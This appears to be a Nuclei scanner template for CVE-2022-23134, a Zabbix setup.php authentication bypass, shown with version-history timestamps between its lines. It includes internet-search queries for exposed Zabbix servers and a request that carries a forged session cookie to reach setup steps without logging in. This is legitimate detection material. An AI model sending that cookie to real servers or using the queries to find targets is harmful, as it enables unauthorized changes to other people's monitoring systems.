2022-02-25 16:00:40 +00:00
id : CVE-2022-23134
info :
2022-03-08 17:35:20 +00:00
name : Zabbix Setup Configuration Authentication Bypass
2022-02-25 16:00:40 +00:00
author : bananabr
severity : medium
2022-05-17 09:18:12 +00:00
description : After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
2024-04-22 16:18:41 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix setup configuration.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability.
2022-02-25 16:00:40 +00:00
reference :
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://nvd.nist.gov/vuln/detail/CVE-2022-23134
2022-05-17 09:18:12 +00:00
- https://support.zabbix.com/browse/ZBX-20384
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/
2023-07-11 19:49:27 +00:00
- https://lists.debian.org/debian-lts-announce/2022/02/msg00008.html
2022-02-25 16:00:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score : 5.3
cve-id : CVE-2022-23134
2023-10-27 16:34:45 +00:00
cwe-id : CWE-287,CWE-284
2024-05-31 19:23:20 +00:00
epss-score : 0.6298
epss-percentile : 0.97835
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : zabbix
product : zabbix
2024-06-07 10:04:29 +00:00
shodan-query :
- http.favicon.hash:892542951
- http.title:"zabbix-server"
- cpe:"cpe:2.3:a:zabbix:zabbix"
fofa-query :
- icon_hash=892542951
- app="zabbix-监控系统" && body="saml"
- title="zabbix-server"
2024-05-31 19:23:20 +00:00
google-query : intitle:"zabbix-server"
2023-07-11 19:49:27 +00:00
tags : cve,cve2022,zabbix,auth-bypass,kev
2022-02-25 16:00:40 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-25 16:00:40 +00:00
- method : GET
path :
- "{{BaseURL}}/zabbix/setup.php"
- "{{BaseURL}}/setup.php"
2022-02-25 18:30:48 +00:00
2023-07-11 19:49:27 +00:00
stop-at-first-match : true
2022-02-25 16:00:40 +00:00
headers :
Cookie : "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"
2022-02-25 18:30:48 +00:00
2022-02-25 16:00:40 +00:00
matchers-condition : and
matchers :
- type : word
words :
- "Database"
- "host"
- "port"
2022-02-25 18:30:48 +00:00
- "Zabbix"
2022-02-25 16:00:40 +00:00
condition : and
2022-02-25 18:30:48 +00:00
2024-04-22 16:18:41 +00:00
- type : word
words :
- "youtube_main"
- "support.google.com"
part : header
condition : and
negative : true
2022-02-25 16:00:40 +00:00
- type : status
status :
2024-04-23 10:06:08 +00:00
- 200
2024-06-08 16:02:17 +00:00
# digest: 4b0a00483046022100d3b976dacc76a5f92bdb9a92a48c13c9d2a79f3c0265767f8a6410a5278c67aa022100c2ed5ed747658cf421d35c4bd70fb2c1bd723f4d8782d3627c3bf66f8c05eb62:922c64590222798bb761d5b6d8e72950